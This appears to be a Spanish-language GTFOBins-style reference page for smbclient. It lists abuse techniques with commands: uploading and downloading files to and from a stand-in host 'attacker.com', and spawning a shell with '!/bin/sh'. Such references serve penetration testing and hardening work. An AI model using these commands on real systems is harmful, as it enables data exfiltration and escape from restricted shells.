root@defcon-rd // ./arsenal/gtfobins/smbclient
smbclient
./smbclient --examples
Funciones y ejemplos de uso
download
smbclient '\\attacker.com\share' -c 'get /path/to/input-file /path/to/output-file'
shell
smbclient '\\host\share'
!/bin/sh
upload
smbclient '\\attacker.com\share' -c 'put /path/to/input-file /path/to/output-file'
./related --binary=smbclient
Binarios relacionados
Comparten al menos una función con smbclient.